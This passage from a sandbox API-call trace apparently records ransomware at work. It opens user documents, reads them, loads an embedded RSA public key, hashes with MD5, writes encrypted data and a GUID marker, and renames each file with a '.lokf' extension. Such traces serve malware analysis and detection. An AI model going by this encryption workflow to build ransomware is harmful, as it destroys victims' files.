rtim1q0r\\pw62l8v1wmqv\\r8w4k7bjgpjr7cvfgvo.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.405] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1370) returned 1 [0060.406] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.408] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x534, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.408] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.409] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.409] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x55a, lpOverlapped=0x0) returned 1 [0060.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.409] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.410] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.410] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.410] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.410] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.410] GetLastError () returned 0x0 [0060.410] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.410] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.410] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.410] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.410] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x560) returned 0x32947b0 [0060.410] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89298 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d88 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c892e0 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85da0 [0060.410] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85dd0 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85de8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.411] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85de8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85dd0 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.411] GetCurrentThreadId () returned 0x9e0 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a9a0 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.412] GetCurrentThreadId () returned 0x9e0 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.413] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x55a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.413] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.413] CloseHandle (hObject=0x5cc) returned 1 [0060.414] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\r8w4K7BjGpJr7cvfGvO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\r8w4k7bjgpjr7cvfgvo.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\r8w4K7BjGpJr7cvfGvO.ots.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\r8w4k7bjgpjr7cvfgvo.ots.lokf")) returned 1 [0060.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.414] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0060.415] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1d38e0, ftCreationTime.dwHighDateTime=0x1d4c88b, ftLastAccessTime.dwLowDateTime=0xd0471700, ftLastAccessTime.dwHighDateTime=0x1d4c620, ftLastWriteTime.dwLowDateTime=0xd0471700, ftLastWriteTime.dwHighDateTime=0x1d4c620, nFileSizeHigh=0x0, nFileSizeLow=0x29df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sj-YHyN9.pptx", cAlternateFileName="SJ-YHY~1.PPT")) returned 1 [0060.415] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\sj-YHyN9.pptx") returned=".pptx" [0060.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\sj-YHyN9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\sj-yhyn9.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.415] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=10719) returned 1 [0060.415] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.418] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x29b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.418] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.419] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x29df, lpOverlapped=0x0) returned 1 [0060.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.419] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.419] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.419] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.419] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.420] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.420] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.420] GetLastError () returned 0x0 [0060.420] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.420] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.420] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.420] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.420] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.420] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e00 | out: hHeap=0x660000) returned 1 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.420] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e00 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85de8 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.420] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e00 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.421] GetCurrentThreadId () returned 0x9e0 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8aa30 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.421] GetCurrentThreadId () returned 0x9e0 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.421] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.421] HeapFree (in: 